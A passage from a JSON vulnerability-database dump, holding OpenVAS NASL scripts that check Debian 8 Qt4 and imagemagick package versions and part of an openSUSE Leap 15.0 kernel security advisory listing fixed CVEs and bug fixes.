ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-designer\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-designer-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-dev\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-dev-bin\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-gui\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-help\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-network\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-opengl\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-opengl-dev\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-phonon\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-private-dev\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-qt3support\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-qt3support-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-script\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-script-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-scripttools\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-ibase\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-mysql\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-odbc\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-psql\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-sqlite\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-sqlite2\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-sql-tds\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-svg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-test\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-webkit\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-webkit-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-xml\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-xmlpatterns\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-xmlpatterns-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqtcore4\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqtdbus4\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqtgui4\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qdbus\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-bin-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-default\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-demos\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-demos-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-designer\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-dev-tools\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-doc\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-doc-html\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-linguist-tools\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-qmake\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-qmlviewer\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qt4-qtconfig\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"qtcore4-l10n\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-16T12:22:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "OPENVAS:1361412562310891785", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891785", "title": "Debian LTS Advisory ([SECURITY] [DLA 1785-1] imagemagick security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891785\");\n script_version(\"2019-05-15T02:01:09+0000\");\n script_cve_id(\"CVE-2017-1000445\", \"CVE-2017-1000476\", \"CVE-2017-11446\", \"CVE-2017-11523\", \"CVE-2017-11537\", \"CVE-2017-12140\", \"CVE-2017-12430\", \"CVE-2017-12432\", \"CVE-2017-12435\", \"CVE-2017-12563\", \"CVE-2017-12587\", \"CVE-2017-12643\", \"CVE-2017-12670\", \"CVE-2017-12674\", \"CVE-2017-12691\", \"CVE-2017-12692\", \"CVE-2017-12693\", \"CVE-2017-12875\", \"CVE-2017-13133\", \"CVE-2017-13142\", \"CVE-2017-13145\", \"CVE-2017-13658\", \"CVE-2017-13768\", \"CVE-2017-14060\", \"CVE-2017-14172\", \"CVE-2017-14173\", \"CVE-2017-14174\", \"CVE-2017-14175\", \"CVE-2017-14249\", \"CVE-2017-14341\", \"CVE-2017-14400\", \"CVE-2017-14505\", \"CVE-2017-14532\", \"CVE-2017-14624\", \"CVE-2017-14625\", \"CVE-2017-14626\", \"CVE-2017-14739\", \"CVE-2017-14741\", \"CVE-2017-15015\", \"CVE-2017-15017\", \"CVE-2017-15281\", \"CVE-2017-17682\", \"CVE-2017-17914\", \"CVE-2017-18271\", \"CVE-2017-18273\", \"CVE-2017-9500\", \"CVE-2019-10650\", \"CVE-2019-11597\", \"CVE-2019-11598\", \"CVE-2019-9956\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-15 02:01:09 +0000 (Wed, 15 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-15 02:01:09 +0000 (Wed, 15 May 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1785-1] imagemagick security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1785-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/867778\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/868950\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/869210\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/869712\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/873059\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/869727\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/870491\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/870504\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'imagemagick'\n package(s) announced via the DSA-1785-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Numerous security vulnerabilities were fixed in Imagemagick. Various\nmemory handling problems and cases of missing or incomplete input\nsanitizing may result in denial of service, memory or CPU exhaustion,\ninformation disclosure or potentially the execution of arbitrary code\nwhen a malformed image file is processed.\");\n\n script_tag(name:\"affected\", value:\"'imagemagick' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n8:6.8.9.9-5+deb8u16.\n\nWe recommend that you upgrade your imagemagick packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"imagemagick-dbg\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagick++-6.q16-5\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u16\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2019-05-16T16:20:31", "bulletinFamily": "unix", "description": "The openSUSE Leap 15.0 kernel was updated to receive various security and\n bugfixes.\n\n Four new speculative execution information leak issues have been\n identified in Intel CPUs. (bsc#1111331)\n\n - CVE-2018-12126: Microarchitectural Store Buffer Data Sampling (MSBDS)\n - CVE-2018-12127: Microarchitectural Fill Buffer Data Sampling (MFBDS)\n - CVE-2018-12130: Microarchitectural Load Port Data Samling (MLPDS)\n - CVE-2019-11091: Microarchitectural Data Sampling Uncacheable Memory\n (MDSUM)\n\n This kernel update contains software mitigations for these issues, which\n also utilize CPU microcode updates shipped in parallel.\n\n For more information on this set of information leaks, check out\n <a rel=\"nofollow\" href=\"https://www.suse.com/support/kb/doc/?id=7023736\">https://www.suse.com/support/kb/doc/?id=7023736</a>\n\n The following security bugs were fixed:\n\n - CVE-2018-16880: A flaw was found in handle_rx() function in the\n vhost_net driver. A malicious virtual guest, under specific conditions,\n can trigger an out-of-bounds write in a kmalloc-8 slab on a virtual host\n which may lead to a kernel memory corruption and a system panic. Due to\n the nature of the flaw, privilege escalation cannot be fully ruled out.\n (bnc#1122767).\n - CVE-2019-11486: The Siemens R3964 line discipline driver in\n drivers/tty/n_r3964.c had multiple race conditions (bnc#1133188). It has\n been disabled.\n - CVE-2019-11815: An issue was discovered in rds_tcp_kill_sock in\n net/rds/tcp.c. There is a race condition leading to a use-after-free,\n related to net namespace cleanup (bnc#1134537).\n - CVE-2019-11884: The do_hidp_sock_ioctl function in\n net/bluetooth/hidp/sock.c allowed a local user to obtain potentially\n sensitive information from kernel stack memory via a HIDPCONNADD\n command, because a name field may not end with a '\\0' character\n (bnc#1134848).\n - CVE-2019-3882: A flaw was found in vfio interface implementation that\n permits violation of the user's locked memory limit. If a device is\n bound to a vfio driver, such as vfio-pci, and the local attacker is\n administratively granted ownership of the device, it may cause a system\n memory exhaustion and thus a denial of service (DoS). (bnc#1131416\n bnc#1131427).\n - CVE-2019-9003: Attackers can trigger a\n drivers/char/ipmi/ipmi_msghandler.c use-after-free and OOPS by arranging\n for certain simultaneous execution of the code, as demonstrated by a\n "service ipmievd restart" loop (bnc#1126704).\n - CVE-2019-9500: A brcmfmac heap buffer overflow in brcmf_wowl_nd_results\n was fixed (bnc#1132681).\n - CVE-2019-9503: Multiple brcmfmac frame validation bypasses have been\n fixed (bnc#1132828).\n\n The following non-security bugs were fixed:\n\n - 9p: do not trust pdu content for stat item size (bsc#1051510).\n - acpi, nfit: Prefer _DSM over _LSR for namespace label reads\n (bsc#1112128) (bsc#1132426).\n - ACPI / SBS: Fix GPE storm on recent MacBookPro's (bsc#1051510).\n - ALSA: core: Do not refer to snd_cards array directly (bsc#1051510).\n - ALSA: core: Fix card races between register and disconnect (bsc#1051510).\n - ALSA: emu10k1: Drop superfluous id-uniquification behavior (bsc#1051510).\n - ALSA: hda - Add two more machines to the power_save_blacklist\n (bsc#1051510).\n - ALSA: hda/hdmi - Consider eld_valid when reporting jack event\n (bsc#1051510).\n - ALSA: hda/hdmi - Read the pin sense from register when repolling\n (bsc#1051510).\n - ALSA: hda: Initialize power_state field properly (bsc#1051510).\n - ALSA: hda/realtek - Add new Dell platform for headset mode (bsc#1051510).\n - ALSA: hda/realtek - Add quirk for Tuxedo XC 1509 (bsc#1131442).\n - ALSA: hda/realtek - Add support headset mode for DELL WYSE AIO\n (bsc#1051510).\n - ALSA: hda/realtek - Add support headset mode for New DELL WYSE NB\n (bsc#1051510).\n - ALSA: hda/realtek - add two more pin configuration sets to quirk table\n (bsc#1051510).\n - ALSA: hda/realtek - Apply the fixup for ASUS Q325UAR (bsc#1051510).\n - ALSA: hda/realtek - EAPD turn on later (bsc#1051510).\n - ALSA: hda/realtek - Fixed Dell AIO speaker noise (bsc#1051510).\n - ALSA: hda - Register irq handler after the chip initialization\n (bsc#1051510).\n - ALSA: hdea/realtek - Headset fixup for System76 Gazelle (gaze14)\n (bsc#1051510).\n - ALSA: info: Fix racy addition/deletion of nodes (bsc#1051510).\n - ALSA: line6: Avoid polluting led_* namespace (bsc#1051510).\n - ALSA: line6: use dynamic buffers (bsc#1051510).\n - ALSA: PCM: check if ops are defined before suspending PCM (bsc#1051510).\n - ALSA: seq: Align temporary re-locking with irqsave version (bsc#1051510).\n - ALSA: seq: Correct unlock sequence at snd_seq_client_ioctl_unlock()\n (bsc#1051510).\n - ALSA: seq: Cover unsubscribe_port() in list_mutex (bsc#1051510).\n - ALSA: seq: Fix OOB-reads from strlcpy (bsc#1051510).\n - ALSA: seq: Fix race of get-subscription call vs port-delete ioctls\n (bsc#1051510).\n - ALSA: seq: Protect in-kernel ioctl calls with mutex (bsc#1051510).\n - ALSA: seq: Protect racy pool manipulation from OSS sequencer\n (bsc#1051510).\n - ALSA: seq: Remove superfluous irqsave flags (bsc#1051510).\n - ALSA: seq: Simplify snd_seq_kernel_client_enqueue() helper (bsc#1051510).\n - ALSA: timer: Check ack_list emptiness instead of bit flag (bsc#1051510).\n - ALSA: timer: Coding style fixes (bsc#1051510).\n - ALSA: timer: Make snd_timer_close() really kill pending actions\n (bsc#1051510).\n - ALSA: timer: Make sure to clear pending ack list (bsc#1051510).\n - ALSA: timer: Revert active callback sync check at close (bsc#1051510).\n - ALSA: timer: Simplify error path in snd_timer_open() (bsc#1051510).\n - ALSA: timer: Unify timer callback process code (bsc#1051510).\n - ALSA: usb-audio: Fix a memory leak bug (bsc#1051510).\n - ALSA: usb-audio: Handle the error from\n snd_usb_mixer_apply_create_quirk() (bsc#1051510).\n - ALSA: usx2y: fix a double free bug (bsc#1051510).\n - ASoC: cs4270: Set auto-increment bit for register writes (bsc#1051510).\n - ASoC: fix valid stream condition (bsc#1051510).\n - ASoC: fsl-asoc-card: fix object reference leaks in fsl_asoc_card_probe\n (bsc#1051510).\n - ASoC: fsl_esai: fix channel swap issue when stream starts (bsc#1051510).\n - ASoC: fsl_esai: Fix missing break in switch statement (bsc#1051510).\n - ASoC: hdmi-codec: fix S/PDIF DAI (bsc#1051510).\n - ASoC: Intel: avoid Oops if DMA setup fails (bsc#1051510).\n - ASoC: max98090: Fix restore of DAPM Muxes (bsc#1051510).\n - ASoC: nau8810: fix the issue of widget with prefixed name (bsc#1051510).\n - ASoC: nau8824: fix the issue of the widget with prefix name\n (bsc#1051510).\n - ASoC: RT5677-SPI: Disable 16Bit SPI Transfers (bsc#1051510).\n - ASoC: samsung: odroid: Fix clock configuration for 44100 sample rate\n (bsc#1051510).\n - ASoC:soc-pcm:fix a codec fixup issue in TDM case (bsc#1051510).\n - ASoC: stm32: fix sai driver name initialisation (bsc#1051510).\n - ASoC: tlv320aic32x4: Fix Common Pins (bsc#1051510).\n - ASoC: topology: free created components in tplg load error (bsc#1051510).\n - ASoC: wm_adsp: Add locking to wm_adsp2_bus_error (bsc#1051510).\n - assume flash part size to be 4MB, if it can't be determined\n (bsc#1127371).\n - at76c50x-usb: Do not register led_trigger if usb_register_driver failed\n (bsc#1051510).\n - ath10k: avoid possible string overflow (bsc#1051510).\n - audit: fix a memleak caused by auditing load module (bsc#1051510).\n - b43: shut up clang -Wuninitialized variable warning (bsc#1051510).\n - batman-adv: Reduce claim hash refcnt only for removed entry\n (bsc#1051510).\n - batman-adv: Reduce tt_global hash refcnt only for removed entry\n (bsc#1051510).\n - batman-adv: Reduce tt_local hash refcnt only for removed entry\n (bsc#1051510).\n - bcache: account size of buckets used in uuid write to\n ca->meta_sectors_written (bsc#1130972).\n - bcache: add a comment in super.c (bsc#1130972).\n - bcache: add code comments for bset.c (bsc#1130972).\n - bcache: add comment for cache_set->fill_iter (bsc#1130972).\n - bcache: add identifier names to arguments of function definitions\n (bsc#1130972).\n - bcache: add missing SPDX header (bsc#1130972).\n - bcache: add MODULE_DESCRIPTION information (bsc#1130972).\n - bcache: add separate workqueue for journal_write to avoid deadlock\n (bsc#1130972).\n - bcache: add static const prefix to char * array declarations\n (bsc#1130972).\n - bcache: add sysfs_strtoul_bool() for setting bit-field variables\n (bsc#1130972).\n - bcache: add the missing comments for smp_mb()/smp_wmb() (bsc#1130972).\n - bcache: cannot set writeback_running via sysfs if no writeback kthread\n created (bsc#1130972).\n - bcache: correct dirty data statistics (bsc#1130972).\n - bcache: do not assign in if condition in bcache_init() (bsc#1130972).\n - bcache: do not assign in if condition register_bcache() (bsc#1130972).\n - bcache: do not check if debug dentry is ERR or NULL explicitly on remove\n (bsc#1130972).\n - bcache: do not check NULL pointer before calling kmem_cache_destroy\n (bsc#1130972).\n - bcache: do not clone bio in bch_data_verify (bsc#1130972).\n - bcache: do not mark writeback_running too early (bsc#1130972).\n - bcache: export backing_dev_name via sysfs (bsc#1130972).\n - bcache: export backing_dev_uuid via sysfs (bsc#1130972).\n - bcache: fix code comments style (bsc#1130972).\n - bcache: fix indentation issue, remove tabs on a hunk of code\n (bsc#1130972).\n - bcache: fix indent by replacing blank by tabs (bsc#1130972).\n - bcache: fix input integer overflow of congested threshold (bsc#1130972).\n - bcache: fix input overflow to cache set io_error_limit (bsc#1130972).\n - bcache: fix input overflow to cache set sysfs file io_error_halflife\n (bsc#1130972).\n - bcache: fix input overflow to journal_delay_ms (bsc#1130972).\n - bcache: fix input overflow to sequential_cutoff (bsc#1130972).\n - bcache: fix input overflow to writeback_delay (bsc#1130972).\n - bcache: fix input overflow to writeback_rate_minimum (bsc#1130972).\n - bcache: fix ioctl in flash device (bsc#1130972).\n - bcache: fix mistaken code comments in bcache.h (bsc#1130972).\n - bcache: fix mistaken comments in request.c (bsc#1130972).\n - bcache: fix potential div-zero error of writeback_rate_i_term_inverse\n (bsc#1130972).\n - bcache: fix potential div-zero error of writeback_rate_p_term_inverse\n (bsc#1130972).\n - bcache: fix typo in code comments of closure_return_with_destructor()\n (bsc#1130972).\n - bcache: fix typo 'succesfully' to 'successfully' (bsc#1130972).\n - bcache: improve sysfs_strtoul_clamp() (bsc#1130972).\n - bcache: introduce force_wake_up_gc() (bsc#1130972).\n - bcache: make cutoff_writeback and cutoff_writeback_sync tunable\n (bsc#1130972).\n - bcache: Move couple of functions to sysfs.c (bsc#1130972).\n - bcache: Move couple of string arrays to sysfs.c (bsc#1130972).\n - bcache: move open brace at end of function definitions to next line\n (bsc#1130972).\n - bcache: never writeback a discard operation (bsc#1130972).\n - bcache: not use hard coded memset size in bch_cache_accounting_clear()\n (bsc#1130972).\n - bcache: option to automatically run gc thread after writeback\n (bsc#1130972).\n - bcache: panic fix for making cache device (bsc#1130972).\n - bcache: Populate writeback_rate_minimum attribute (bsc#1130972).\n - bcache: prefer 'help' in Kconfig (bsc#1130972).\n - bcache: print number of keys in trace_bcache_journal_write (bsc#1130972).\n - bcache: recal cached_dev_sectors on detach (bsc#1130972).\n - bcache: remove unnecessary space before ioctl function pointer arguments\n (bsc#1130972).\n - bcache: remove unused bch_passthrough_cache (bsc#1130972).\n - bcache: remove useless parameter of bch_debug_init() (bsc#1130972).\n - 